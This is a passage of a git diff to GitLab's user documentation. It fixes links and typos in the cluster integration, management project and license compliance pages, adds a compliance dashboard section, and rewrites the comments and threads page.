must be specified using [CI/CD variables](../../ci/variables/index.md): - `JUPYTERHUB_PROXY_SECRET_TOKEN` - Secure string used for signing communications from the hub. Read [`proxy.secretToken`](https://zero-to-jupyterhub.readthedocs.io/en/stable/reference/reference.html#proxy-secrettoken). diff --git a/doc/user/clusters/integrations.md b/doc/user/clusters/integrations.md index 6c87efaf5a3..d2861ce2946 100644 --- a/doc/user/clusters/integrations.md +++ b/doc/user/clusters/integrations.md @@ -88,7 +88,7 @@ To enable the Prometheus integration for your cluster: > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61077) in GitLab 13.12. You can integrate your cluster with [Elastic -Stack](https://www.elastic.co/elastic-stack) to index and [query your pod +Stack](https://www.elastic.co/elastic-stack/) to index and [query your pod logs](../project/clusters/kubernetes_pod_logs.md). ### Elastic Stack Prerequisites @@ -119,7 +119,7 @@ wget https://gitlab.com/gitlab-org/project-templates/cluster-management/-/raw/ma helm repo add gitlab https://charts.gitlab.io # Install Elastic Stack -helm install prometheus gitlab/elastic-stack -n gitlab-managed-apps --values values.yaml +helm install elastic-stack gitlab/elastic-stack -n gitlab-managed-apps --values values.yaml ``` ### Enable Elastic Stack integration for your cluster @@ -134,6 +134,6 @@ To enable the Elastic Stack integration for your cluster: - For an [instance-level cluster](../instance/clusters/index.md), navigate to your instance's **Kubernetes** page. 1. Select the **Integrations** tab. -1. Check the **Enable Prometheus integration** checkbox. +1. Check the **Enable Elastic Stack integration** checkbox. 1. Click **Save changes**. 1. Go to the **Health** tab to see your cluster's metrics. diff --git a/doc/user/clusters/management_project.md b/doc/user/clusters/management_project.md index f741ab2d95a..204afa9fc89 100644 --- a/doc/user/clusters/management_project.md +++ b/doc/user/clusters/management_project.md @@ -22,7 +22,7 @@ This can be useful for: ## Permissions Only the management project receives `cluster-admin` privileges. All -other projects continue to receive [namespace scoped `edit` level privileges](../project/clusters/add_remove_clusters.md#rbac-cluster-resources). +other projects continue to receive [namespace scoped `edit` level privileges](../project/clusters/cluster_access.md#rbac-cluster-resources). Management projects are restricted to the following: @@ -45,12 +45,11 @@ To use a cluster management project for a cluster: To select a cluster management project to use: 1. Navigate to the appropriate configuration page. For a: - - [Project-level cluster](../project/clusters/index.md), navigate to your project's + - [Project-level cluster](../project/clusters/index.md), go to your project's **Infrastructure > Kubernetes clusters** page. - - [Group-level cluster](../group/clusters/index.md), navigate to your group's **Kubernetes** - page. - - [Instance-level cluster](../instance/clusters/index.md), navigate to Admin Area's **Kubernetes** + - [Group-level cluster](../group/clusters/index.md), go to your group's **Kubernetes** page. + - [Instance-level cluster](../instance/clusters/index.md), go to **Menu >** **{admin}** **Admin > Kubernetes** page. 1. Select the project using **Cluster management project field** in the **Advanced settings** section. @@ -59,7 +58,7 @@ To select a cluster management project to use: ### Configuring your pipeline After designating a project as the management project for the cluster, -write a [`.gitlab-ci.yml`](../../ci/yaml/README.md) in that project. For example: +write a [`.gitlab-ci.yml`](../../ci/yaml/index.md) in that project. For example: ```yaml configure cluster: @@ -72,7 +71,7 @@ configure cluster: ### Setting the environment scope [Environment -scopes](../project/clusters/index.md#setting-the-environment-scope) +scopes](../project/clusters/multiple_kubernetes_clusters.md#setting-the-environment-scope) are usable when associating multiple clusters to the same management project. @@ -88,7 +87,7 @@ to a management project: | Production | `production` | The following environments set in -[`.gitlab-ci.yml`](../../ci/yaml/README.md) deploy to the +[`.gitlab-ci.yml`](../../ci/yaml/index.md) deploy to the Development, Staging, and Production cluster respectively. ```yaml diff --git a/doc/user/clusters/management_project_template.md b/doc/user/clusters/management_project_template.md index 52390cb18b0..eb86c1702cc 100644 --- a/doc/user/clusters/management_project_template.md +++ b/doc/user/clusters/management_project_template.md @@ -18,10 +18,10 @@ need, or even add new ones that are not built-in. ## How to use this template -1. Create a new project, choosing "GitLab Cluster Management" from the list of [built-in project templates](../project/working_with_projects.md#built-in-templates). +1. Create a new project, choosing "GitLab Cluster Management" from the list of [built-in project templates](../project/working_with_projects.md#built-in-templates). 1. Make this project a [cluster management project](management_project.md). 1. If you used the [GitLab Managed Apps](applications.md), refer to - [Migrating from GitLab Manged Apps](migrating_from_gma_to_project_template.md). + [Migrating from GitLab Managed Apps](migrating_from_gma_to_project_template.md). ### Components @@ -37,10 +37,10 @@ In the repository of the newly-created project, you will find: The base image used in your pipeline is built by the [cluster-applications](https://gitlab.com/gitlab-org/cluster-integration/cluster-applications) project. This image consists of a set of Bash utility scripts to support [Helm v3 releases](https://helm.sh/docs/intro/using_helm/#three-big-concepts): -- `gl-fail-if-helm2-releases-exist {namespace}`: It tries to detect whether you have apps deployed through Helm v2 - releases for a given namespace. If so, it will fail the pipeline and ask you to manually +- `gl-fail-if-helm2-releases-exist {namespace}`: It tries to detect whether you have apps deployed through Helm v2 + releases for a given namespace. If so, it will fail the pipeline and ask you to manually [migrate your Helm v2 releases to Helm v3](https://helm.sh/docs/topics/v2_v3_migration/). -- `gl-ensure-namespace {namespace}`: It creates the given namespace if it does not exist and adds the necessary label +- `gl-ensure-namespace {namespace}`: It creates the given namespace if it does not exist and adds the necessary label for the [Cilium](https://github.com/cilium/cilium/) app network policies to work. - `gl-adopt-resource-with-helm-v3 {arguments}`: Used only internally in the [cert-manager's](https://cert-manager.io/) Helmfile to facilitate the GitLab Managed Apps adoption. @@ -50,7 +50,7 @@ project. This image consists of a set of Bash utility scripts to support [Helm v #### The main `helmfile.yml` file -This file has a list of paths to other Helmfiles for each app. They're all commented out by default, so you must uncomment +This file has a list of paths to other Helmfiles for each app. They're all commented out by default, so you must uncomment the paths for the apps that you would like to manage. By default, each `helmfile.yaml` in these sub-paths will have the attribute `installed: true`, which signifies that everytime @@ -58,7 +58,7 @@ the pipeline runs, Helmfile will try to either install or update your apps accor cluster and Helm releases. If you change this attribute to `installed: false`, Helmfile will try to uninstall this app from your cluster. [Read more](https://github.com/roboll/helmfile) about how Helmfile works. -Furthermore, each app has an `applications/{app}/values.yaml` file. This is the +Furthermore, each app has an `applications/{app}/values.yaml` file. This is the place where you can define some default values for your app's Helm chart. Some apps will already have defaults pre-defined by GitLab. @@ -82,5 +82,5 @@ The [built-in supported applications](https://gitlab.com/gitlab-org/project-temp ### Migrating from GitLab Managed Apps -If you had GitLab Managed Apps, either One-Click or CI/CD install, read the docs on how to +If you had GitLab Managed Apps, either One-Click or CI/CD install, read the docs on how to [migrate from GitLab Managed Apps to project template](migrating_from_gma_to_project_template.md) diff --git a/doc/user/clusters/migrating_from_gma_to_project_template.md b/doc/user/clusters/migrating_from_gma_to_project_template.md index 7fa6ccea433..dc16cf5cc45 100644 --- a/doc/user/clusters/migrating_from_gma_to_project_template.md +++ b/doc/user/clusters/migrating_from_gma_to_project_template.md @@ -35,9 +35,9 @@ The [GitLab Managed Apps](applications.md) are deprecated in GitLab 14.0. To mig applications that you would like to manage with this project. Although you could uncomment all the ones you want to managed at once, we recommend you repeat the following steps separately for each app, so you do not get lost during the process. -1. Edit the associated `applications/{app}/helmfiles.yaml` to match the chart version currently deployed +1. Edit the associated `applications/{app}/helmfiles.yaml` to match the chart version currently deployed for your app. Take a GitLab Runner Helm v3 release as an example: - + The following command lists the releases and their versions: ```shell @@ -83,7 +83,7 @@ The [GitLab Managed Apps](applications.md) are deprecated in GitLab 14.0. To mig 1. After following all the previous steps, [run a pipeline manually](../../ci/pipelines/index.md#run-a-pipeline-manually) and watch the `apply` job logs to see if any of your applications were successfully detected, installed, and whether they got any unexpected updates. - + Some annotation checksums are expected to be updated, as well as this attribute: ```diff diff --git a/doc/user/compliance/compliance_dashboard/index.md b/doc/user/compliance/compliance_dashboard/index.md index 21af6387f9d..fb6b3fe2cf6 100644 --- a/doc/user/compliance/compliance_dashboard/index.md +++ b/doc/user/compliance/compliance_dashboard/index.md @@ -22,6 +22,22 @@ To access the Compliance Dashboard for a group, navigate to **{shield}** **Secur NOTE: The Compliance Dashboard shows only the latest MR on each project. +## Merge request drawer + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/299357) in GitLab 14.1. + +When you click on a row, a drawer is shown that provides further details about the merge +request: + +- Project name and [compliance framework label](../../project/settings/index.md#compliance-frameworks), + if the project has one assigned. +- Link to the merge request. +- The merge request's branch path in the format `[source] into [target]`. +- A list of users that committed changes to the merge request. +- A list of users that commented on the merge request. +- A list of users that approved the merge request. +- The user that merged the merge request. + ## Use cases This feature is for people who care about the compliance status of projects within their group. diff --git a/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v13_2.png b/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v13_2.png Binary files differdeleted file mode 100644 index ee3bb310c1a..00000000000 --- a/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v13_2.png +++ /dev/null diff --git a/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v14_2.png b/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v14_2.png Binary files differnew file mode 100644 index 00000000000..c188c6cd834 --- /dev/null +++ b/doc/user/compliance/license_compliance/img/policies_maintainer_edit_v14_2.png diff --git a/doc/user/compliance/license_compliance/index.md b/doc/user/compliance/license_compliance/index.md index f757a548aee..1a43c5ae96f 100644 --- a/doc/user/compliance/license_compliance/index.md +++ b/doc/user/compliance/license_compliance/index.md @@ -9,7 +9,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/5483) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 11.0. -If you're using [GitLab CI/CD](../../../ci/README.md), you can use License Compliance to search your +If you're using [GitLab CI/CD](../../../ci/index.md), you can use License Compliance to search your project's dependencies for their licenses. You can then decide whether to allow or deny the use of each license. For example, if your application uses an external (open source) library whose license is incompatible with yours, then you can deny the use of that license. @@ -47,8 +47,7 @@ When GitLab detects a **Denied** license, you can view it in the [license list](  You can view and modify existing policies from the [policies](#policies) tab. - - + ## Supported languages and package managers @@ -58,7 +57,7 @@ Java 8 and Gradle 1.x projects are not supported. The minimum supported version | Language | Package managers | Notes | |------------|----------------------------------------------------------------------------------------------|-------| -| JavaScript | [Bower](https://bower.io/), [npm](https://www.npmjs.com/) | | +| JavaScript | [Bower](https://bower.io/), [npm](https://www.npmjs.com/) (7 and earlier) | | | Go | [Godep](https://github.com/tools/godep), [go mod](https://github.com/golang/go/wiki/Modules) | | | Java | [Gradle](https://gradle.org/), [Maven](https://maven.apache.org/) | | | .NET | [NuGet](https://www.nuget.org/) | The .NET Framework is supported via the [mono project](https://www.mono-project.com/). There are, however, some limitations. The scanner doesn't support Windows-specific dependencies and doesn't report dependencies of your project's listed dependencies. Also, the scanner always marks detected licenses for all dependencies as `unknown`. | @@ -74,12 +73,12 @@ The reported licenses might be incomplete or inaccurate. |------------|---------------------------------------------------------------------------------------------------------------| | JavaScript | [Yarn](https://yarnpkg.com/) | | Go | `go get`, `gvt`, `glide`, `dep`, `trash`, `govendor` | -| Erlang | [Rebar](https://www.rebar3.org/) | +| Erlang | [Rebar](https://rebar3.org/) | | Objective-C, Swift | [Carthage](https://github.com/Carthage/Carthage), [CocoaPods](https://cocoapods.org/) v0.39 and below | | Elixir | [Mix](https://elixir-lang.org/getting-started/mix-otp/introduction-to-mix.html) | | C++/C | [Conan](https://conan.io/) | | Scala | [sbt](https://www.scala-sbt.org/) | -| Rust | [Cargo](https://crates.io) | +| Rust | [Cargo](https://crates.io) | | PHP | [Composer](https://getcomposer.org/) | ## Requirements @@ -90,11 +89,11 @@ To run a License Compliance scanning job, you need GitLab Runner with the ## Configuration For GitLab 12.8 and later, to enable License Compliance, you must -[include](../../../ci/yaml/README.md#includetemplate) the +[include](../../../ci/yaml/index.md#includetemplate) the [`License-Scanning.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/License-Scanning.gitlab-ci.yml) that's provided as a part of your GitLab installation. For older versions of GitLab from 11.9 to 12.7, you must -[include](../../../ci/yaml/README.md#includetemplate) the +[include](../../../ci/yaml/index.md#includetemplate) the [`License-Management.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/d2cc841c55d65bc8134bfb3a467e66c36ac32b0a/lib/gitlab/ci/templates/Security/License-Management.gitlab-ci.yml). For GitLab versions earlier than 11.9, you can copy and use the job as defined that template. @@ -115,14 +114,14 @@ the `license_management` job, so you must migrate to the `license_scanning` job `License-Scanning.gitlab-ci.yml` template. The results are saved as a -[License Compliance report artifact](../../../ci/yaml/README.md#artifactsreportslicense_scanning) +[License Compliance report artifact](../../../ci/yaml/index.md#artifactsreportslicense_scanning) that you can later download and analyze. Due to implementation limitations, we always take the latest License Compliance artifact available. Behind the scenes, the [GitLab License Compliance Docker image](https://gitlab.com/gitlab-org/security-products/analyzers/license-finder) is used to detect the languages/frameworks and in turn analyzes the licenses. The License Compliance settings can be changed through [CI/CD variables](#available-cicd-variables) by using the -[`variables`](../../../ci/yaml/README.md#variables) parameter in `.gitlab-ci.yml`. +[`variables`](../../../ci/yaml/index.md#variables) parameter in `.gitlab-ci.yml`. ### When License Compliance runs @@ -180,8 +179,8 @@ directory of your project. ### Overriding the template WARNING: -Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/README.md#only--except) -is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) instead. +Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/index.md#only--except) +is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/index.md#rules) instead. If you want to override the job definition (for example, change properties like `variables` or `dependencies`), you need to declare a `license_scanning` job @@ -370,7 +369,7 @@ source "https://gems.example.com" You can supply a custom root certificate to complete TLS verification by using the `ADDITIONAL_CA_CERT_BUNDLE` [CI/CD variable](#available-cicd-variables), or by specifying a [`BUNDLE_SSL_CA_CERT`](https://bundler.io/v2.0/man/bundle-config.1.html) -[variable](../../../ci/variables/README.md#custom-cicd-variables) +[variable](../../../ci/variables/index.md#custom-cicd-variables) in the job definition. ### Configuring Cargo projects @@ -394,7 +393,7 @@ To supply a custom root certificate to complete TLS verification, do one of the - Use the `ADDITIONAL_CA_CERT_BUNDLE` [CI/CD variable](#available-cicd-variables). - Specify a [`CARGO_HTTP_CAINFO`](https://doc.rust-lang.org/cargo/reference/environment-variables.html) - [variable](../../../ci/variables/README.md#custom-cicd-variables) + [variable](../../../ci/variables/index.md#custom-cicd-variables) in the job definition. ### Configuring Composer projects @@ -427,7 +426,7 @@ For example: You can supply a custom root certificate to complete TLS verification by using the `ADDITIONAL_CA_CERT_BUNDLE` [CI/CD variable](#available-cicd-variables), or by specifying a [`COMPOSER_CAFILE`](https://getcomposer.org/doc/03-cli.md#composer-cafile) -[variable](../../../ci/variables/README.md#custom-cicd-variables) +[variable](../../../ci/variables/index.md#custom-cicd-variables) in the job definition. ### Configuring Conan projects @@ -441,7 +440,7 @@ documentation for a list of settings that you can apply. The `license_scanning` job runs in a [Debian 10](https://www.debian.org/releases/buster/) Docker image. The supplied image ships with some build tools such as [CMake](https://cmake.org/) and [GCC](https://gcc.gnu.org/). However, not all project types are supported by default. To install additional tools needed to -compile dependencies, use a [`before_script`](../../../ci/yaml/README.md#before_script) +compile dependencies, use a [`before_script`](../../../ci/yaml/index.md#before_script) to install the necessary build tools using the [`apt`](https://wiki.debian.org/PackageManagementTools) package manager. For a comprehensive list, consult [the Conan documentation](https://docs.conan.io/en/latest/introduction.html#all-platforms-all-build-systems-and-compilers). @@ -490,7 +489,7 @@ example: } ``` -If credentials are required to authenticate then you can configure a [protected CI/CD variable](../../../ci/variables/README.md#protect-a-cicd-variable) +If credentials are required to authenticate then you can configure a [protected CI/CD variable](../../../ci/variables/index.md#protect-a-cicd-variable) following the naming convention described in the [`CONAN_LOGIN_USERNAME` documentation](https://docs.conan.io/en/latest/reference/env_vars.html#conan-login-username-conan-login-username-remote-name). #### Custom root certificates for Conan @@ -722,7 +721,7 @@ which enables a designated approver that can approve and then merge a merge requ The **Policies** tab in the project's license compliance section displays your project's license policies. Project maintainers can specify policies in this section. - +  Developers of the project can view the policies configured in a project. @@ -857,4 +856,4 @@ root@6abb70e9f193:~# ``` NOTE: -Selecting a custom version of [Mono](https://www.mono-project.com/) or [.NET Core](https://dotnet.microsoft.com/download/dotnet-core) is currently not supported. +Selecting a custom version of [Mono](https://www.mono-project.com/) or [.NET Core](https://dotnet.microsoft.com/download/dotnet) is currently not supported. diff --git a/doc/user/discussions/img/automatically_resolve_outdated_discussions.png b/doc/user/discussions/img/automatically_resolve_outdated_discussions.png Binary files differdeleted file mode 100644 index a6fc4b0aef1..00000000000 --- a/doc/user/discussions/img/automatically_resolve_outdated_discussions.png +++ /dev/null diff --git a/doc/user/discussions/img/btn_new_issue_for_all_threads.png b/doc/user/discussions/img/btn_new_issue_for_all_threads.png Binary files differindex 5d86e0ca016..b07267a011a 100644 --- a/doc/user/discussions/img/btn_new_issue_for_all_threads.png +++ b/doc/user/discussions/img/btn_new_issue_for_all_threads.png diff --git a/doc/user/discussions/img/comment_type_toggle.gif b/doc/user/discussions/img/comment_type_toggle.gif Binary files differdeleted file mode 100644 index b73c197b97f..00000000000 --- a/doc/user/discussions/img/comment_type_toggle.gif +++ /dev/null diff --git a/doc/user/discussions/img/commit_comment_mr_context.png b/doc/user/discussions/img/commit_comment_mr_context.png Binary files differdeleted file mode 100644 index 68f58a57757..00000000000 --- a/doc/user/discussions/img/commit_comment_mr_context.png +++ /dev/null diff --git a/doc/user/discussions/img/commit_comment_mr_discussions_tab.png b/doc/user/discussions/img/commit_comment_mr_discussions_tab.png Binary files differdeleted file mode 100644 index d88f08eae26..00000000000 --- a/doc/user/discussions/img/commit_comment_mr_discussions_tab.png +++ /dev/null diff --git a/doc/user/discussions/img/discussion_lock_system_notes.png b/doc/user/discussions/img/discussion_lock_system_notes.png Binary files differdeleted file mode 100644 index 44a47e3f097..00000000000 --- a/doc/user/discussions/img/discussion_lock_system_notes.png +++ /dev/null diff --git a/doc/user/discussions/img/image_resolved_discussion.png b/doc/user/discussions/img/image_resolved_discussion.png Binary files differdeleted file mode 100644 index f6e5a3b66ae..00000000000 --- a/doc/user/discussions/img/image_resolved_discussion.png +++ /dev/null diff --git a/doc/user/discussions/img/lock_form_member.png b/doc/user/discussions/img/lock_form_member.png Binary files differdeleted file mode 100644 index 7bfcb4faae6..00000000000 --- a/doc/user/discussions/img/lock_form_member.png +++ /dev/null diff --git a/doc/user/discussions/img/lock_form_non_member.png b/doc/user/discussions/img/lock_form_non_member.png Binary files differdeleted file mode 100644 index 59e5fd89499..00000000000 --- a/doc/user/discussions/img/lock_form_non_member.png +++ /dev/null diff --git a/doc/user/discussions/img/merge_request_commits_tab.png b/doc/user/discussions/img/merge_request_commits_tab.png Binary files differdeleted file mode 100644 index 267f3a720dc..00000000000 --- a/doc/user/discussions/img/merge_request_commits_tab.png +++ /dev/null diff --git a/doc/user/discussions/img/new_issue_for_thread.png b/doc/user/discussions/img/new_issue_for_thread.png Binary files differindex 28b76adf7fe..c7f0fd76844 100644 --- a/doc/user/discussions/img/new_issue_for_thread.png +++ b/doc/user/discussions/img/new_issue_for_thread.png diff --git a/doc/user/discussions/img/onion_skin_view.png b/doc/user/discussions/img/onion_skin_view.png Binary files differdeleted file mode 100644 index 81bb4a2c85a..00000000000 --- a/doc/user/discussions/img/onion_skin_view.png +++ /dev/null diff --git a/doc/user/discussions/img/preview_issue_for_thread.png b/doc/user/discussions/img/preview_issue_for_thread.png Binary files differdeleted file mode 100644 index a9d7ab598be..00000000000 --- a/doc/user/discussions/img/preview_issue_for_thread.png +++ /dev/null diff --git a/doc/user/discussions/img/preview_issue_for_threads.png b/doc/user/discussions/img/preview_issue_for_threads.png Binary files differdeleted file mode 100644 index 8757decb178..00000000000 --- a/doc/user/discussions/img/preview_issue_for_threads.png +++ /dev/null diff --git a/doc/user/discussions/img/quickly_assign_commenter_v13_1.png b/doc/user/discussions/img/quickly_assign_commenter_v13_1.png Binary files differindex 7f8ce62fe88..aa8f65ef6c4 100644 --- a/doc/user/discussions/img/quickly_assign_commenter_v13_1.png +++ b/doc/user/discussions/img/quickly_assign_commenter_v13_1.png diff --git a/doc/user/discussions/img/reply_to_comment.gif b/doc/user/discussions/img/reply_to_comment.gif Binary files differdeleted file mode 100644 index c62f7fdb5fe..00000000000 --- a/doc/user/discussions/img/reply_to_comment.gif +++ /dev/null diff --git a/doc/user/discussions/img/resolve_comment_button.png b/doc/user/discussions/img/resolve_comment_button.png Binary files differdeleted file mode 100644 index 0a3ed03a69c..00000000000 --- a/doc/user/discussions/img/resolve_comment_button.png +++ /dev/null diff --git a/doc/user/discussions/img/resolve_thread_button_v13_3.png b/doc/user/discussions/img/resolve_thread_button_v13_3.png Binary files differdeleted file mode 100644 index 1d7b10ce25d..00000000000 --- a/doc/user/discussions/img/resolve_thread_button_v13_3.png +++ /dev/null diff --git a/doc/user/discussions/img/resolve_thread_issue_notice.png b/doc/user/discussions/img/resolve_thread_issue_notice.png Binary files differdeleted file mode 100644 index 30a65b8fbd4..00000000000 --- a/doc/user/discussions/img/resolve_thread_issue_notice.png +++ /dev/null diff --git a/doc/user/discussions/img/resolve_thread_open_issue_v13_9.png b/doc/user/discussions/img/resolve_thread_open_issue_v13_9.png Binary files differdeleted file mode 100644 index 8ff0f5e84dd..00000000000 --- a/doc/user/discussions/img/resolve_thread_open_issue_v13_9.png +++ /dev/null diff --git a/doc/user/discussions/img/start_image_discussion.gif b/doc/user/discussions/img/start_image_discussion.gif Binary files differindex 43efbf2fbb2..18b2a4701cc 100644 --- a/doc/user/discussions/img/start_image_discussion.gif +++ b/doc/user/discussions/img/start_image_discussion.gif diff --git a/doc/user/discussions/img/swipe_view.png b/doc/user/discussions/img/swipe_view.png Binary files differdeleted file mode 100644 index e6f5e5053af..00000000000 --- a/doc/user/discussions/img/swipe_view.png +++ /dev/null diff --git a/doc/user/discussions/img/thread_view.png b/doc/user/discussions/img/thread_view.png Binary files differdeleted file mode 100644 index e2db44aa604..00000000000 --- a/doc/user/discussions/img/thread_view.png +++ /dev/null diff --git a/doc/user/discussions/img/turn_off_lock.png b/doc/user/discussions/img/turn_off_lock.png Binary files differdeleted file mode 100644 index aae1def6f72..00000000000 --- a/doc/user/discussions/img/turn_off_lock.png +++ /dev/null diff --git a/doc/user/discussions/img/turn_on_lock.png b/doc/user/discussions/img/turn_on_lock.png Binary files differdeleted file mode 100644 index f36ffc8831b..00000000000 --- a/doc/user/discussions/img/turn_on_lock.png +++ /dev/null diff --git a/doc/user/discussions/img/two_up_view.png b/doc/user/discussions/img/two_up_view.png Binary files differdeleted file mode 100644 index 3b6ddfbe1be..00000000000 --- a/doc/user/discussions/img/two_up_view.png +++ /dev/null diff --git a/doc/user/discussions/img/unresolved_threads_v14_1.png b/doc/user/discussions/img/unresolved_threads_v14_1.png Binary files differnew file mode 100644 index 00000000000..806dfdc995c --- /dev/null +++ b/doc/user/discussions/img/unresolved_threads_v14_1.png diff --git a/doc/user/discussions/index.md b/doc/user/discussions/index.md index cf57afb8324..825f9be6ba6 100644 --- a/doc/user/discussions/index.md +++ b/doc/user/discussions/index.md @@ -5,343 +5,294 @@ info: "To determine the technical writer assigned to the Stage/Group associated type: reference, howto --- -# Threads **(FREE)** +# Comments and threads **(FREE)** GitLab encourages communication through comments, threads, and [code suggestions](../project/merge_requests/reviews/suggestions.md). -For example, you can create a comment in the following places: +There are two types of comments: -- Issues -- Epics -- Merge requests -- Snippets -- Commits -- Commit diffs +- A standard comment. +- A comment in a thread, which has to be resolved. -There are standard comments, and you also have the option to create a comment -in the form of a thread. A comment can also be [turned into a thread](#start-a-thread-by-replying-to-a-standard-comment) -when it receives a reply. +In a comment, you can enter [Markdown](../markdown.md) and use [quick actions](../project/quick_actions.md). -The comment area supports [Markdown](../markdown.md) and [quick actions](../project/quick_actions.md). -You can [suggest code changes](../project/merge_requests/reviews/suggestions.md) in your comment, -which the user can accept through the user interface. You can edit your own -comment at any time, and anyone with the [Maintainer role](../permissions.md) or -higher can also edit a comment made by someone else. - -You can also reply to a comment notification email to reply to the comment if -[Reply by email](../../administration/reply_by_email.md) is configured for your GitLab instance. Replying to a standard comment -creates another standard comment. Replying to a threaded comment creates a reply in the thread. Email replies support -[Markdown](../markdown.md) and [quick actions](../project/quick_actions.md), just as if you replied from the web. +You can [suggest code changes](../project/merge_requests/reviews/suggestions.md) in your commit diff comment, +which the user can accept through the user interface. -NOTE: -There is a limit of 5,000 comments for every object, for example: issue, epic, and merge request. +## Places you can add comments -## Resolvable comments and threads +You can create comments in places like: -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/5022) in GitLab 8.11. -> - Resolvable threads can be added only to merge request diffs. -> - Resolving comments individually was [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/28750) in GitLab 13.6. - -Thread resolution helps keep track of progress during planning or code review. - -Every thread in merge requests, commits, commit diffs, and -snippets is initially displayed as unresolved. They can then be individually resolved by anyone -with at least Developer access to the project or by the author of the change being reviewed. -If the thread has been resolved and a non-member un-resolves their own response, -this also unresolves the discussion thread. -If the non-member then resolves this same response, this resolves the discussion thread. - -The need to resolve threads prevents you from forgetting to address feedback and lets you -hide threads that are no longer relevant. - - - -### Commit threads in the context of a merge request - -For reviewers with commit-based workflow, it may be useful to add threads to -specific commit diffs in the context of a merge request. These threads -persist through a commit ID change when: - -- force-pushing after a rebase -- amending a commit +- Commit diffs +- Commits +- Designs +- Epics +- Issues +- Merge requests +- Snippets -To create a commit diff thread: +Each object can have as many as 5,000 comments. -1. Navigate to the merge request **Commits** tab. A list of commits that - constitute the merge request are shown. +## Add a comment to a merge request diff -  +You can add comments to a merge request diff. These comments +persist, even when you: -1. Navigate to a specific commit, select the **Changes** tab (where you - are only be presented diffs from the selected commit), and leave a comment. +- Force-push after a rebase. +- Amend a commit. -  +To add a commit diff comment: -1. Any threads created this way are shown in the merge request's - **Discussions** tab and are resolvable. +1. To select a specific commit, on the merge request, select the **Commits** tab, select the commit + message. To view the latest commit, select the **Changes** tab. +1. By the line you want to comment on, hover over the line number and select **{comment}**. + You can select multiple lines by dragging the **{comment}** icon. +1. Type your comment and select **Start a review** or **Add comment now**. -  +The comment is displayed on the merge request's **Discussions** tab. -Threads created this way only appear in the original merge request -and not when navigating to that commit under your project's -**Repository > Commits** page. +The comment is not displayed on your project's **Repository > Commits** page. NOTE: -When a link of a commit reference is found in a thread inside a merge -request, it is automatically converted to a link in the context of the -current merge request. - -### Marking a comment or thread as resolved +When your comment contains a reference to a commit included in the merge request, +it's automatically converted to a link in the context of the current merge request. +For example, `28719b171a056960dfdc0012b625d0b47b123196` becomes +`https://gitlab.example.com/example-group/example-project/-/merge_requests/12345/diffs?commit_id=28719b171a056960dfdc0012b625d0b47b123196`. -You can mark a thread as resolved by selecting the **Resolve thread** -button at the bottom of the thread. +## Add a comment to a commit - +You can add comments and threads to a particular commit. -Alternatively, you can mark each comment as resolved individually. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Repository > Commits**. +1. Below the commits, in the **Comment** field, enter a comment. +1. Select **Comment** or select the down arrow (**{chevron-down}**) to select **Start thread**. - - -### Move all unresolved threads in a merge request to an issue +WARNING: +Threads created this way are lost if the commit ID changes after a +force push. -To continue all open threads from a merge request in a new issue, select -**Resolve all threads in new issue**. +## Add a comment to an image - +In merge requests and commit detail views, you can add a comment to an image. +This comment can also be a thread. -Alternatively, when your project only accepts merge requests [when all threads -are resolved](#only-allow-merge-requests-to-be-merged-if-all-threads-are-resolved), -an **open an issue to resolve them later** link displays in the merge -request widget. +1. Hover your mouse over the image. +1. Select the location where you want to comment. - +An icon is displayed on the image and a comment field is displayed. -This prepares an issue with its content referring to the merge request and -the unresolved threads. + - +## Reply to a comment by sending email -Hitting **Create issue** causes all threads to be marked as resolved and -add a note referring to the newly created issue. +If you have ["reply by email"](../../administration/reply_by_email.md) configured, +you can reply to comments by sending an email. - +- When you reply to a standard comment, another standard comment is created. +- When you reply to a threaded comment, it creates a reply in the thread. -You can now proceed to merge the merge request from the UI. +You can use [Markdown](../markdown.md) and [quick actions](../project/quick_actions.md) in your email replies. -### Moving a single thread to a new issue +## Who can edit comments -To create a new issue for a single thread, you can use the **Resolve this -thread in a new issue** button. +You can edit your own comment at any time. - +Anyone with the [Maintainer role](../permissions.md) or +higher can also edit a comment made by someone else. -This directs you to a new issue prefilled with the content of the -thread, similar to the issues created for delegating multiple -threads at once. Saving the issue marks the thread as resolved and -add a note to the merge request thread referencing the new issue. +## Prevent comments by locking an issue - +You can prevent public comments in an issue or merge request. +When you do, only project members can add and edit comments. -### Only allow merge requests to be merged if all threads are resolved +Prerequisite: -You can prevent merge requests from being merged until all threads are -resolved. +- In merge requests, you must have at least the Developer role. +- In issues, you must have at least the Reporter role. -Navigate to your project's settings page, select the -**Only allow merge requests to be merged if all threads are resolved** check -box and hit **Save** for the changes to take effect. +1. On the right sidebar, next to **Lock issue** or **Lock merge request**, select **Edit**. +1. On the confirmation dialog, select **Lock**. - +Notes are added to the page details. -From now on, you can't merge from the UI until all threads -are resolved. +If an issue or merge request is locked and closed, you cannot reopen it. - +## Mark a comment as confidential -### Automatically resolve merge request diff threads when they become outdated +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207473) in GitLab 13.9. +> - [Deployed behind a feature flag](../feature_flags.md), disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to enable it. **(FREE SELF)** -You can automatically resolve merge request diff threads on lines modified -with a new push. +WARNING: +This feature might not be available to you. Check the **version history** note above for details. -Navigate to your project's settings page, select the **Automatically resolve -merge request diffs threads on lines changed with a push** check box and hit -**Save** for the changes to take effect. 